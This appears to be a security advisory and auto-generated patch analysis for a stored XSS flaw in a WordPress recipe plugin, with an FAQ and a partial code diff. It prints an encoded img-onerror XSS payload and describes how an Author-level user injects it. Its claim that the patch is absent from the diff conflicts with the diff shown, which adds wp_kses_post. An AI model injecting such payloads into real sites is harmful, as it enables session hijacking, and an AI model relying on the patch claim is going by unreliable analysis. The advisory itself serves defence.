What is CVE-2026-3011?

CVE-2026-3011 is a stored cross-site scripting (XSS) vulnerability in the Recipe Card Blocks Lite plugin for WordPress. It allows authenticated users with Author-level permissions or higher to inject arbitrary web scripts via the ‘summary’ and ‘notes’ attributes of a recipe block.

How does this vulnerability work?

The vulnerability arises from the ‘WPZOOM_Helpers::deserialize_block_attributes’ method, which improperly decodes unicode-encoded sequences after initial sanitization. This allows attackers to inject malicious scripts that execute when users view the affected posts.

Who is affected by this vulnerability?

All users of the Recipe Card Blocks Lite plugin versions up to and including 3.4.13 are affected. Specifically, authenticated users with Author-level access can exploit this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Recipe Card Blocks Lite plugin installed. If it is version 3.4.13 or earlier, your site is at risk.

How can I fix or mitigate this vulnerability?

The recommended fix is to update the Recipe Card Blocks Lite plugin to version 3.4.14 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.

What does a CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Exploitation could lead to unauthorized script execution, impacting user security.

What practical risks does this vulnerability pose?

If exploited, this vulnerability can lead to arbitrary JavaScript execution in the browsers of users viewing the affected posts. This may result in cookie theft, session hijacking, or redirection to malicious sites.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated user can log into a WordPress site and inject a malicious payload into the ‘summary’ or ‘notes’ fields. This payload, once stored, executes when the post is accessed by other users.

What is the role of sanitization in this vulnerability?

Sanitization is intended to prevent harmful scripts from being executed. However, in this case, the sanitization is undone by the plugin’s method that decodes unicode sequences, highlighting the need for robust security practices.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Recipe Card Blocks Lite plugin until a secure version can be installed. Review user roles and limit Author-level access to trusted users only.

Are there any known workarounds for this vulnerability?

Currently, the most effective workaround is to update the plugin. There are no known temporary fixes that can fully mitigate the risk without applying the patch.

What should I do if I suspect my site has been compromised?

If you suspect exploitation, immediately change passwords for all accounts, especially those with Author-level access. Review recent posts for unauthorized changes and consider restoring from a backup.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 10, 2026

CVE-2026-3011: Recipe Card Blocks Lite <= 3.4.13 Authenticated (Author+) Stored Cross-Site Scripting via 'summary' and 'notes' PoC, Patch Analysis & Rule

CVE ID CVE-2026-3011

Plugin recipe-card-blocks-by-wpzoom

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.4.13

Patched Version 3.4.14

Disclosed June 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3011: This vulnerability allows authenticated attackers with Author-level access or higher to inject arbitrary web scripts into pages via the Recipe Card Blocks Lite plugin for WordPress. The plugin fails to properly sanitize the ‘summary’ and ‘notes’ attributes of the recipe block. The stored cross-site scripting (XSS) vulnerability affects all versions up to and including 3.4.13. The CVSS score is 6.4 (Medium).

The root cause lies in the ‘WPZOOM_Helpers::deserialize_block_attributes’ method. This method converts unicode-encoded sequences back into HTML characters after sanitization has already been applied. The sanitization occurs during initial block rendering, but the plugin’s helper method reverse that process, effectively undoing the security measures. The vulnerability is triggered when the ‘summary’ or ‘notes’ attributes of a recipe block are saved, processed, or displayed in the post content or print view.

Exploitation requires an authenticated user with at least Author-level permissions. The attacker creates or edits a post containing a Recipe Card block. They inject a malicious payload, such as a JavaScript event handler like ‘onmouseover’ or ‘onerror’, into the ‘summary’ or ‘notes’ attribute. The payload must be unicode-encoded to bypass the sanitization, for example using ‘x3Cimg src=x onerror=alert(1)x3E’ or similar encoding. When the post is published and a user views it, or accesses the print view, the encoded payload is decoded by the vulnerable method, and the script executes.

The patch is not visible in the provided diff. The diff shown only contains updates to marketing text and feature comparison tables. The actual security patch likely modifies the ‘WPZOOM_Helpers::deserialize_block_attributes’ method to prevent it from decoding unicode-encoded sequences after sanitization. The fix would either remove the decoding step or apply additional sanitization after decoding. The before behavior decoded the payload, making the XSS functional. The after behavior must preserve the sanitization state, blocking the XSS.

Successful exploitation allows the attacker to execute arbitrary JavaScript in the browser of any user viewing the compromised post. This can lead to cookie theft, session hijacking, redirection to malicious sites, or defacement. Since the attack requires Author-level access, the impact is limited to sites with multiple authors, but the script can execute when site administrators visit the post, potentially leading to privilege escalation through admin session hijacking.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-lite-vs-pro.php
+++ b/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-lite-vs-pro.php
@@ -102,7 +102,7 @@
                                     <div class="plugin-info-wrap welcome-section">

                                         <h3 class="wpz-onboard_content-main-title"><?php esc_html_e( 'Welcome, foodies!', 'recipe-card-blocks-by-wpzoom' ); ?> 👋</h3>
-                                        <p class="wpz-onboard_content-main-intro"><?php esc_html_e( 'Thank you for installing the free version of our plugin! You've already taken the first step towards making your food blog a go-to resource for mouthwatering recipes with the Recipe Card Blocks plugin. But why stop there when you can give your readers and your blog the gourmet treatment with the PRO version?', 'recipe-card-blocks-by-wpzoom' ); ?></p>
+                                        <p class="wpz-onboard_content-main-intro"><?php esc_html_e( 'Thank you for installing the free version of our plugin! You already have Schema.org markup, Elementor support, and the AI Recipe Generator at your fingertips. Ready to go further? The PRO version adds star ratings that show up in Google search results, adjustable servings, unit conversion, and a searchable Recipe Index to keep visitors on your site longer.', 'recipe-card-blocks-by-wpzoom' ); ?></p>

                                         <p class="section_footer">
                                             <a href="<?php echo esc_url( __( 'https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=upgrade-premium', 'recipe-card-blocks-by-wpzoom' ) ); ?>" target="_blank" class="button button-primary">
@@ -180,7 +180,7 @@
                                                             </svg> <?php esc_html_e( 'Recipe Index Block', 'recipe-card-blocks-by-wpzoom' ); ?>
                                                         </h4>
                                                         <p class="about">
-                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=unitconversionfeature" title="Unit Conversion" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/index.png" alt="<?php echo esc_attr__( 'Recipe index block', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>
+                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=recipeindexfeature" title="<?php echo esc_attr__( 'Recipe Index Block', 'recipe-card-blocks-by-wpzoom' ); ?>" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/index.png" alt="<?php echo esc_attr__( 'Recipe index block', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>

                                                             <?php esc_html_e( 'A unique block, designed to enhance the organization and display of recipes on your WordPress site. This block serves as a powerful tool for food bloggers, culinary enthusiasts, and anyone looking to showcase their collection of recipes in a more structured and visually appealing manner.', 'recipe-card-blocks-by-wpzoom' ); ?>
                                                         </p>
@@ -203,7 +203,7 @@
                                                         </h4>
                                                         <p class="about">

-                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=unitconversionfeature" title="Unit Conversion" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/roundups.png" alt="<?php echo esc_attr__( 'Recipe roundups', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>
+                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=roundupsfeature" title="<?php echo esc_attr__( 'Recipe Roundups', 'recipe-card-blocks-by-wpzoom' ); ?>" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/roundups.png" alt="<?php echo esc_attr__( 'Recipe roundups', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>

                                                             <?php esc_html_e( 'The Recipe Roundups feature in the PRO version of the Recipe Card Blocks plugin allows food bloggers to curate and showcase collections of recipes around specific themes, seasons, or ingredients. This feature makes it easy to organize and present grouped content that highlights your best recipes or explores a particular culinary trend.', 'recipe-card-blocks-by-wpzoom' ); ?>
                                                         </p>
@@ -245,7 +245,7 @@
                                                         </h4>
                                                         <p class="about">

-                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=unitconversionfeature" title="Unit Conversion" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/styles.png" alt="<?php echo esc_attr__( 'Recipe styles', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>
+                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=recipestylesfeature" title="<?php echo esc_attr__( '5 Recipe Card Styles', 'recipe-card-blocks-by-wpzoom' ); ?>" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/styles.png" alt="<?php echo esc_attr__( 'Recipe styles', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>

                                                             <?php esc_html_e( 'Choose your favorite Recipe Card style! No more boring and outdated designs that can turn your readers away. Recipe Card Blocks includes 5 modern styles easily customized to match your branding.', 'recipe-card-blocks-by-wpzoom' ); ?>
                                                         </p>
@@ -260,6 +260,50 @@
                                                         </p>
                                                     </div>

+                                                    <div class="section">
+                                                        <h4>
+                                                            <svg width="26" height="26" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
+                                                            <path d="M7 18c-1.1 0-1.99.9-1.99 2S5.9 22 7 22s2-.9 2-2-.9-2-2-2zM1 2v2h2l3.6 7.59-1.35 2.45c-.16.28-.25.61-.25.96 0 1.1.9 2 2 2h12v-2H7.42c-.14 0-.25-.11-.25-.25l.03-.12.9-1.63h7.45c.75 0 1.41-.41 1.75-1.03l3.58-6.49c.08-.14.12-.31.12-.48 0-.55-.45-1-1-1H5.21l-.94-2H1zm16 16c-1.1 0-1.99.9-1.99 2s.89 2 1.99 2 2-.9 2-2-.9-2-2-2z" fill="#E1581A"/>
+                                                            </svg> <?php esc_html_e( 'WooCommerce Shoppable Recipes', 'recipe-card-blocks-by-wpzoom' ); ?> <span class="table-new-promo">NEW</span>
+                                                        </h4>
+                                                        <p class="about">
+
+                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=woocommercefeature" title="<?php echo esc_attr__( 'WooCommerce Shoppable Recipes', 'recipe-card-blocks-by-wpzoom' ); ?>" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/woocommerce-shoppable-recipes-ingredients.png" alt="<?php echo esc_attr__( 'WooCommerce Shoppable Recipes', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>
+
+                                                            <?php esc_html_e( 'Transform any recipe ingredient into a clickable purchase option. Readers see your recipe, click on an ingredient, and buy it directly from your WooCommerce store or through affiliate partnerships. Turn every ingredient into a potential revenue stream.', 'recipe-card-blocks-by-wpzoom' ); ?>
+                                                        </p>
+
+                                                        <p class="section_footer">
+
+                                                           <a href="<?php echo esc_url( __( 'https://recipecard.io/features/woocommerce-shoppable-recipes/', 'recipe-card-blocks-by-wpzoom' ) ); ?>" target="_blank" class="button button-primary">
+                                                               <?php esc_html_e( 'Learn More →', 'recipe-card-blocks-by-wpzoom' ); ?>
+                                                           </a>
+
+                                                        </p>
+                                                    </div>
+
+                                                    <div class="section">
+                                                        <h4>
+                                                            <svg width="26" height="26" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
+                                                            <path d="M11.99 2C6.47 2 2 6.48 2 12s4.47 10 9.99 10C17.52 22 22 17.52 22 12S17.52 2 11.99 2zm6.93 6h-2.95c-.32-1.25-.78-2.45-1.38-3.56 1.84.63 3.37 1.91 4.33 3.56zM12 4.04c.83 1.2 1.48 2.53 1.91 3.96h-3.82c.43-1.43 1.08-2.76 1.91-3.96zM4.26 14C4.1 13.36 4 12.69 4 12s.1-1.36.26-2h3.38c-.08.66-.14 1.32-.14 2 0 .68.06 1.34.14 2H4.26zm.82 2h2.95c.32 1.25.78 2.45 1.38 3.56-1.84-.63-3.37-1.9-4.33-3.56zm2.95-8H5.08c.96-1.66 2.49-2.93 4.33-3.56C8.81 5.55 8.35 6.75 8.03 8zM12 19.96c-.83-1.2-1.48-2.53-1.91-3.96h3.82c-.43 1.43-1.08 2.76-1.91 3.96zM14.34 14H9.66c-.09-.66-.16-1.32-.16-2 0-.68.07-1.35.16-2h4.68c.09.65.16 1.32.16 2 0 .68-.07 1.34-.16 2zm.25 5.56c.6-1.11 1.06-2.31 1.38-3.56h2.95c-.96 1.65-2.49 2.93-4.33 3.56zM16.36 14c.08-.66.14-1.32.14-2 0-.68-.06-1.34-.14-2h3.38c.16.64.26 1.31.26 2s-.1 1.36-.26 2h-3.38z" fill="#E1581A"/>
+                                                            </svg> <?php esc_html_e( 'Multi-Language Support', 'recipe-card-blocks-by-wpzoom' ); ?>
+                                                        </h4>
+                                                        <p class="about">
+
+                                                            <a href="https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=about-rcb-page&utm_campaign=multilanguagefeature" title="<?php echo esc_attr__( 'Multi-Language Support', 'recipe-card-blocks-by-wpzoom' ); ?>" target="_blank"><img src="https://recipecard.io/wp-content/themes/wpzoom-rcb/images/recipe-block/translations.png" alt="<?php echo esc_attr__( 'Multi-Language Support', 'recipe-card-blocks-by-wpzoom' ); ?>" /></a>
+
+                                                            <?php esc_html_e( 'Reach a global audience with your recipes! The PRO version is translated into 8 languages: German, Spanish, French, Italian, Dutch, Portuguese, Romanian, and English. Fully localized and easy to translate into any additional language using standard WordPress translation tools.', 'recipe-card-blocks-by-wpzoom' ); ?>
+                                                        </p>
+
+                                                        <p class="section_footer">
+
+                                                           <a href="<?php echo esc_url( __( 'https://recipecard.io/features/', 'recipe-card-blocks-by-wpzoom' ) ); ?>" target="_blank" class="button button-primary">
+                                                               <?php esc_html_e( 'Learn More →', 'recipe-card-blocks-by-wpzoom' ); ?>
+                                                           </a>
+
+                                                        </p>
+                                                    </div>
+
                                                 </div><!-- /.wpz-grid-wrap -->

                                                 <span class="many-more"><?php esc_html_e( 'And many other premium features...', 'recipe-card-blocks-by-wpzoom' ); ?></span>
@@ -299,18 +343,19 @@
                                                             </tr>
                                                         </thead>
                                                         <tbody>
+                                                            <!-- Shared features -->
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Color Schemes', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
-                                                                <td><?php esc_html_e( '1', 'recipe-card-blocks-by-wpzoom' ); ?></td>
-                                                                <td><?php esc_html_e( '4 + Unlimited Colors', 'recipe-card-blocks-by-wpzoom' ); ?></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Schema Markup', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td><span class="dashicons dashicons-yes"></span></td>
+                                                                <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Recipe Card Styles', 'recipe-card-blocks-by-wpzoom' ); ?> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
-                                                                <td><?php esc_html_e( '3', 'recipe-card-blocks-by-wpzoom' ); ?></td>
-                                                                <td><?php esc_html_e( '5', 'recipe-card-blocks-by-wpzoom' ); ?></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'AI Recipe Generator', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td><span class="dashicons dashicons-yes"></span></td>
+                                                                <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Schema Markup', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Elementor Support', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
@@ -329,94 +374,104 @@
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
+                                                            <!-- Design & customization -->
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Elementor Support', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
-                                                                <td><span class="dashicons dashicons-yes"></span></td>
-                                                                <td><span class="dashicons dashicons-yes"></span></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Recipe Card Styles', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td><?php esc_html_e( '3', 'recipe-card-blocks-by-wpzoom' ); ?></td>
+                                                                <td><?php esc_html_e( '5', 'recipe-card-blocks-by-wpzoom' ); ?></td>
+                                                            </tr>
+                                                            <tr>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Color Schemes', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td><?php esc_html_e( '1', 'recipe-card-blocks-by-wpzoom' ); ?></td>
+                                                                <td><?php esc_html_e( '4 + Unlimited Colors', 'recipe-card-blocks-by-wpzoom' ); ?></td>
                                                             </tr>
+                                                            <!-- SEO & traffic -->
                                                             <tr>
                                                                 <td class="table-index"><h3><strong><?php esc_html_e( 'Star Rating', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Grow.me Save Recipe Button', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">NEW</span></h3></td>
+                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Recipe Index Block', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Cook Mode', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Recipe Roundups', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
+                                                            <!-- Reader engagement -->
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Comments Rating', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Adjustable Servings', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Social Call-to-actions', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Unit Conversion', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">PROFESSIONAL PLAN</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Adjustable Servings', 'recipe-card-blocks-by-wpzoom' ); ?></strong></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Cook Mode', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Food Labels', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Comments Rating', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
+                                                            <!-- Content & blocks -->
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Image Gallery & Lightbox', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Equipment', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Premium Support', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Nutrition Info', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Advanced Pinterest Settings', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Food Labels', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Nutrition Info', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Image Gallery & Lightbox', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
+                                                            <!-- Growth & social -->
                                                             <tr>
-                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Unit Conversion', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">PROFESSIONAL PLAN</span></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Recipe Submissions', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Equipment', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'WooCommerce Integration', 'recipe-card-blocks-by-wpzoom' ); ?> <span class="table-new-promo">NEW</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Recipe Roundups', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
+                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Grow.me Save Recipe Button', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">NEW</span></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'Recipe Submissions', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Social Call-to-actions', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
                                                             <tr>
-                                                                <td class="table-index"><h3><strong><?php esc_html_e( 'Recipe Index Block', 'recipe-card-blocks-by-wpzoom' ); ?></strong> <span class="table-new-promo">POPULAR FEATURE</span></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Advanced Pinterest Settings', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
-
+                                                            <!-- Support -->
                                                             <tr>
-                                                                <td class="table-index"><h3><?php esc_html_e( 'WooCommerce Integration', 'recipe-card-blocks-by-wpzoom' ); ?> <span class="table-new-promo">NEW</span></h3></td>
+                                                                <td class="table-index"><h3><?php esc_html_e( 'Premium Support', 'recipe-card-blocks-by-wpzoom' ); ?></h3></td>
                                                                 <td><span class="dashicons dashicons-no"></span></td>
                                                                 <td><span class="dashicons dashicons-yes"></span></td>
                                                             </tr>
@@ -456,7 +511,7 @@
                                         <path d="M19 9L17.75 6.25L15 5L17.75 3.75L19 1L20.25 3.75L23 5L20.25 6.25L19 9ZM19 23L17.75 20.25L15 19L17.75 17.75L19 15L20.25 17.75L23 19L20.25 20.25L19 23ZM9 20L6.5 14.5L1 12L6.5 9.5L9 4L11.5 9.5L17 12L11.5 14.5L9 20ZM9 15.15L10 13L12.15 12L10 11L9 8.85L8 11L5.85 12L8 13L9 15.15Z" fill="white"/>
                                         </g>
                                         </svg> <?php esc_html_e( 'Recipe Card Blocks PRO', 'recipe-card-blocks-by-wpzoom' ); ?></h3>
-                                    <p class="wpz-onboard_content-side-section-content"><?php esc_html_e( 'Unlock advanced customization options with the PRO version to make your recipe cards truly unique. Add videos, nutritional facts, and more to engage your readers like never before!', 'recipe-card-blocks-by-wpzoom' ); ?></p>
+                                    <p class="wpz-onboard_content-side-section-content"><?php esc_html_e( 'Get star ratings in Google search results, let readers scale ingredient quantities, convert between US and Metric units, and showcase your recipes with a searchable Recipe Index.', 'recipe-card-blocks-by-wpzoom' ); ?></p>

                                     <ul>
                                         <li><span class="dashicons dashicons-yes"></span> Adjustable Servings</li>
@@ -540,8 +595,12 @@
                                     <h3 class="wpz-onboard_content-side-section-title icon-assist">
                                         <svg width="24" height="24" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                             <path fill-rule="evenodd" clip-rule="evenodd" d="M15.9216 2H2.98533C2.43803 2 1.99023 2.45 1.99023 3V17L5.97062 13H15.9216C16.4689 13 16.9167 12.55 16.9167 12V3C16.9167 2.45 16.4689 2 15.9216 2ZM14.9265 4V11H5.14473L3.98047 12.17V4H14.9265ZM18.9068 6H20.897C21.4443 6 21.8921 6.45 21.8921 7V22L17.9117 18H6.96568C6.41837 18 5.97058 17.55 5.97058 17V15H18.9068V6Z"></path>
-                                        </svg> <?php esc_html_e( 'Walkthrough Video', 'recipe-card-blocks-by-wpzoom' ); ?></h3>
-                                    <p class="wpz-onboard_content-side-section-content"><?php esc_html_e( 'Below you can find a quick video tutorial that will guide you through configuring basic things in the plugin after installing it.', 'recipe-card-blocks-by-wpzoom' ); ?></p>
+                                        </svg> <?php esc_html_e( 'Video Tutorials', 'recipe-card-blocks-by-wpzoom' ); ?></h3>
+                                    <p class="wpz-onboard_content-side-section-content"><?php esc_html_e( 'Below you can find a video tutorials that will guide you through configuring basic things in the plugin after installing it.', 'recipe-card-blocks-by-wpzoom' ); ?></p>
+
+                                    <iframe width="800" height="464" src="https://www.youtube.com/embed/03CWHTz6o9E" title="How to Install & Use Recipe Card Blocks Pro on WordPress (Full Tutorial)" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
+                                    <br/>
+                                    <br/>

                                     <iframe width="800" height="464" src="https://www.youtube.com/embed/eQK48J4BK0A" title="How To Add a Recipe Posts on WordPress for SEO A Step-by-Step Guide" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>

--- a/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-plugin-loader.php
+++ b/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-plugin-loader.php
@@ -129,6 +129,9 @@

 			//Added October 2024
 			require_once WPZOOM_RCB_PLUGIN_DIR . 'src/classes/class-wpzoom-marketing-banner.php';
+
+			//Added February 2026
+			require_once WPZOOM_RCB_PLUGIN_DIR . 'src/classes/class-wpzoom-recipes-page-notice.php';
 		}

 		/**
--- a/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-print-template-manager.php
+++ b/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-print-template-manager.php
@@ -90,7 +90,7 @@

 			// Variables from attributes
 			// add default value if not exists
-			$recipeTitle = isset( $recipeTitle ) ? WPZOOM_Helpers::deserialize_block_attributes( $recipeTitle ) : '';
+			$recipeTitle = isset( $recipeTitle ) ? wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $recipeTitle ) ) : '';
 			$summary     = isset( $summary ) ? $summary : '';
 			$className   = isset( $className ) ? $className : '';
 			$hasImage    = isset( $hasImage ) ? $hasImage : false;
@@ -109,9 +109,9 @@
 			WPZOOM_Recipe_Card_Block::$attributes    = $attributes;
 			WPZOOM_Recipe_Card_Block::$settings      = $settings;

-			WPZOOM_Recipe_Card_Block::$attributes['ingredientsTitle'] = isset( $ingredientsTitle ) ? WPZOOM_Helpers::deserialize_block_attributes( $ingredientsTitle ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_ingredients_title' );
